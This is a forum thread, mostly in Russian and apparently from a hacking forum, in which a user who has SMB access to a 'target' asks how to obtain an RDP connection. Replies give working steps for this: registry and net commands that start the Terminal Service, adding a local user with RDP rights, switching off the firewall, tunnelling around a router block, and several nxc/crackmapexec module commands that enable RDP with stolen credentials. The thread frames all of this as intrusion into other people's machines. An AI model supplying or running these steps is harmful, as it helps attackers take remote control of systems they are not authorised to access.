SMB -> RDP

[SlowMan]

Вопрос следующий:
Допустим есть доступ по SMB к таргету. Как можно сделать что бы был коннект по рдп?
Нужен конкретный пример

 

[mirleoinix]

запустить termserv если он офф
ну и добавить юзера локального с пасом и правами на рдп

 

[SlowMan]

mirleoinix сказал(а):
запустить termserv если он офф
ну и добавить юзера локального с пасом и правами на рдп

А если рдп порт закрыт?

 

[mirleoinix]

что значит закрыт? закрыт чем файрволом или сервис не запущен?
выключить фаер если есть права, поменять порт для рдп и тд

 

[SlowMan]

mirleoinix сказал(а):
что значит закрыт? закрыт чем файрволом или сервис не запущен?
выключить фаер если есть права, поменять порт для рдп и тд

Закрыт на уровне роутера предположим.
Какие есть варианты?

 

[mirleoinix]

найти какой открыт порт и поднять рдп на нем

 

[rwxrwx]

To enable RDP from a command line via SMB access:

1- reg add HKLM\System\CurrentControlSet\Services\TermService /v Start /t REG_DWORD /d 0x00000003 /f

2- net start termservice

 

[xargs]

если "закрыт" для внешнего мира но открыт для локальных сетей тогда пробросить порт (ligolo-ng) . Но для начала нужно собрать информацию минимальную: 1) запущена ли служба RDP, winrm 2) юзер имеет нужные разрешения через группы

 

[downshifter]

nxc smb 192.168.1.1 -u user -p pass -M rdp

Enables/Disables RDP

 

[kamzzzzz]

downshifter сказал(а):
nxc smb 192.168.1.1 -u user -p pass -M rdp

Enables/Disables RDP

nxc это типа новая версия cme, поддержку которго прекратили?

 

[kamzzzzz]

SlowMan сказал(а):
Закрыт на уровне роутера предположим.
Какие есть варианты?

Если он закрыт внешне на роутере, то пробросить прокси\тунель.
И дальше работать проксичейном из локальной сети, в 90% случаев это решит проблему.
Дальше если он не работает, то Выше писали команду для активации термсерва.
Если не срабатывает, то оффаем фаервол на нужной тачке

 

[Sec13B]

downshifter сказал(а):
nxc smb 192.168.1.1 -u user -p pass -M rdp

Enables/Disables RDP

About Module : -M rdp , all are inefficient.



crackmapexec or nxc smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable
crackmapexec or nxc smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable-ram

crackmapexec or nxc smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o METHOD=smb ACTION=enable
crackmapexec or nxc smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o METHOD=smb ACTION=enable-ram

crackmapexec or nxc smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o METHOD=wmi ACTION=enable
crackmapexec or nxc smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o METHOD=wmi ACTION=enable-ram

 

[RocketRacoon]

GitHub - XiaoliChan/wmiexec-Pro: New generation of wmiexec.py
New generation of wmiexec.py. Contribute to XiaoliChan/wmiexec-Pro development by creating an account on GitHub.
github.com
Take a look at this, i have tested and it works like a charm